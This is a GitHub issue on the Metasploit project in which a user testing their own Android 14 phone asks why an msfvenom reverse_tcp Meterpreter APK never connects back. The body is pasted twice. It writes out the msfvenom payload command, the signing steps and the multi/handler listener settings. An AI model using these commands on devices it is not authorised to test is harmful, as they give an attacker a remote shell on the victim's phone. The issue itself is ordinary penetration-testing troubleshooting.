Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Metasploit:Not receiving any incoming connections from the target device #19790

Open
DipakSmg opened this issue Jan 6, 2025 · 2 comments
Open
Labels
android question Questions about Metasploit Usage

Comments

@DipakSmg
Copy link

DipakSmg commented Jan 6, 2025

Hello,

I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android 14 device but am not receiving any signals back from the payload.

Here are the steps I have followed so far:

Generated the payload using msfvenom:

msfvenom -p android/meterpreter/reverse_tcp LHOST=XXX.XXX.X.X LPORT=4444 R > /path/to/output.apk

Signed the APK using apksigner.
Aligned using Zipalign
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST XXX.XXX.X.X
set LPORT 4444
exploit

Despite this, when I run the exploit command, I do Hello,

I am currently using Metasploit for penetration testing and I’ve encountered an issue with using msfvenom to generate a payload. I am trying to perform testing on my Android device (Device 2) but am not receiving any signals back from the payload.

Here are the steps I have followed so far:

Generated the payload using msfvenom:

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.9 LPORT=4444 R > /path/to/output.apk

Signed the APK using apksigner.
Installed the APK on Device 2 (Android 14) and ensured that the required permissions were granted.
Started the Metasploit handler with the following settings:

use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set LHOST XXX.XXX.X.X
set LPORT 4444
exploit

Despite this, when I run the exploit command, I do not receive any incoming connections from the target device (Device 2).
Troubleshooting Steps:

I verified that the device is on the same network as my Kali Linux machine.
I confirmed that the payload is executing on Device 2 using logcat.
I checked for any open ports using netstat and nc to ensure nothing else is using the same port.

Error Message:

I am not seeing any connection logs in Metasploit even though I have the listener configured properly.

Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.

Thank you!.
Troubleshooting Steps:

I verified that the device is on the same network as my Kali Linux machine.
I confirmed that the payload is executing on my Android Device using logcat.
I checked for any open ports using netstat and nc to ensure nothing else is using the same port.

I am not seeing any connection logs in Metasploit even though I have the listener configured properly.

Has anyone encountered this issue before? Any assistance or troubleshooting advice would be greatly appreciated.

Thank you.

@DipakSmg DipakSmg added the question Questions about Metasploit Usage label Jan 6, 2025
@SAKERBOOM

This comment was marked as off-topic.

@bcoles

This comment was marked as off-topic.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
android question Questions about Metasploit Usage
Projects
None yet
Development

No branches or pull requests

4 participants